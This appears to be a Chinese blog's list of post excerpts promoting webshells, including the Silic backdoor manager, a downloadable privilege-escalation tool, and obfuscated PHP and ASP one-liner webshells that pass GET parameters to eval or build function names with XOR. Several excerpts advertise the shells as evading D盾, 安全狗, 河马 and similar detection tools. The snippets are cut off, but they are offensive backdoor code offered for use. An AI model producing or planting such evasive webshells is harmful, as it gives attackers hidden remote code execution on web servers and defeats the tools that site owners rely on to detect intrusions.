会飞的鱼

2018-10-30admins 阅读(7074)评论(0)

登录界面提权下面在发一个黑色的登录界面提权下载地址：https://lanzoui.com/i28shpa

2018-10-30admins 阅读(6048)评论(0)

Silic Webshell V5.6 使用手册Silic Group Hacker Army后门管理程序欢迎使用Silic Group Hacker Army开发的Web安全测试程序本程序基于php开发和运行，代码行数2210 lines, 程序大小135KB(占用空间136KB)，本程序未加密，无后门。请将本脚本置于支持php的目录并访问运行，默认密码为...

2020-10-17admins 阅读(3189)评论(0)

php:<?php $m=$_GET[$m=$_GET['1']; $a=substr($m,0,1); $b=substr($m,1,2); $c=substr($m,2,9999); eval($a.$b.$c)($a.$b); ?> asp：<% P=request("pass") A=mid(P,1,1) B=mid(P,2,99...

2020-9-8admins 阅读(2815)评论(0)

生成的webshell可以绕过包括但不限于D盾、webdir+、河马、安全狗等查杀工具原理使用注释分隔eval函数内关键字,使用类和构造函数替代引用函数项目地址GitHub: https://github.com/pureqh/webshell下载地址:①GitHub: github.com/pureqh/webshell/archive...

2019-9-5admins 阅读(2282)评论(0)

venom 33的更新，webshell免杀PHP一句话，体积更小了。<?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); ...

2019-8-23admins 阅读(2309)评论(0)

免杀PHP一句话shell，利用随机异或免杀D盾，免杀安全狗护卫神等<?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; $gba = 'H...

2019-8-14admins 阅读(1473)评论(0)

之前给的过D盾一句话webshell现在都已被查杀，补个<?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"\x47"; $_1=...

2019-8-14admins 阅读(2645)评论(0)

免杀PHP一句话过最新D盾等，webshell变量随机，增加流量传输编码方式免杀webshell PHP一句话 class LTDS { public function __destruct() { $bxo='X'^"\x39"; $woa='?'^"\x4c"; $uk...

2019-5-16admins 阅读(1480)评论(0)

本文首发于圈子 大家好我是辣鸡404 本文马儿几乎都免杀且用且珍惜0x01 前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧0x02 目录关于eval 于 assert字符串变形定义函数绕过回调函数回调函数变形特殊字符干扰数组类编码绕过无字符特征马PHP7.1后webshell何去何从总结0x03 关于eval 于 assert关于eval...

2019-5-16admins 阅读(2107)评论(0)

0x00 前言现在asp不多但是还是有，还是写一篇文章来简单的介绍下asp的免杀吧，相对于php我们的asp还是不够灵活。0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有：VBScriptASP的注释符号 ： ' 、 REM 当然如果你使用vbscript 注释还有<!-- --> 和//...